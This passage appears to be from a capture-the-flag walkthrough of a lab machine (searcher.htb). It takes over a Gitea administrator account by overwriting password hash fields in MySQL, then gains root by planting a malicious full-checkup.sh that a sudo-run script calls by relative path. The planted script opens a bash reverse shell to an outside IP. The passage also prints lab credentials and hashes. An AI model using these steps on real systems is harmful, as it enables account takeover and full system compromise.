                        passwd: b1f895e8efe070e184e5539bc5d93b362b246db67f3a2b6992f37888cb778e844c0017da8fe89dd784be35da9a337609e82e
              passwd_hash_algo: pbkdf2
          must_change_password: 0
                    login_type: 0
                  login_source: 0
                    login_name: 
                          type: 0
                      location: 
                       website: 
                         rands: 304b5a2ce88b6d989ea5fae74cc6b3f3
                          salt: d1db0a75a18e50de754be2aafcad5533
                      language: en-US
                   description: 
                  created_unix: 1672858006
                  updated_unix: 1680532283
               last_login_unix: 1680532243
          last_repo_visibility: 1
             max_repo_creation: -1
                     is_active: 1
                      is_admin: 0
                 is_restricted: 0
                allow_git_hook: 0
            allow_import_local: 0
     allow_create_organization: 1
                prohibit_login: 0
                        avatar: 
                  avatar_email: cody@gitea.searcher.htb
             use_custom_avatar: 0
                 num_followers: 0
                 num_following: 0
                     num_stars: 0
                     num_repos: 1
                     num_teams: 0
                   num_members: 0
                    visibility: 0
 repo_admin_change_team_access: 0
               diff_view_style: 
                         theme: auto
         keep_activity_private: 0
```

This is neat. We can change the `passwd`, `rands` and `salt` fields for the `administrator` to the ones from `cody`.  
After that, we'd be able to login to `gitea` as `administrator` using the password `jh1usoih2bkjaspwe92`.

```console
mysql> UPDATE user SET passwd = 'b1f895e8efe070e184e5539bc5d93b362b246db67f3a2b6992f37888cb778e844c0017da8fe89dd784be35da9a337609e82e', rands = '304b5a2ce88b6d989ea5fae74cc6b3f3', salt = 'd1db0a75a18e50de754be2aafcad5533' WHERE id = 1;
```

## Relative path abuse

Now, we can login to <http://gitea.searcher.htb> with the credentials `administrator:jh1usoih2bkjaspwe92`  
`administrator` has the repository `scripts` with source for `check-ports.py`, `system-checkup.py`, `full-checkup.sh`, and `install-flask.sh`

The one relevant to us is [system-checkup.py](system-checkup.py)  
The vulnerable part is in the `full-checkup` option:

```py
    elif action == 'full-checkup':
        try:
            arg_list = ['./full-checkup.sh']
            print(run_command(arg_list))
            print('[+] Done!')
        except:
            print('Something went wrong')
            exit(1)
```

Relative path is being used to find `full-checkup.sh`.  
We can abuse that to make it execute a malicious `full-checkup.sh`.

```console
svc@busqueda:~$ echo -e '#!/bin/bash\nbash -c "bash -i >& /dev/tcp/10.10.14.147/9001 0>&1"' > full-checkup.sh
svc@busqueda:~$ chmod +x full-checkup.sh 
svc@busqueda:~$ sudo python3 /opt/scripts/system-checkup.py full-checkup
```

After running it, we'd get a shell as root:

```console
root@busqueda:/home/svc# id
uid=0(root) gid=0(root) groups=0(root)
```
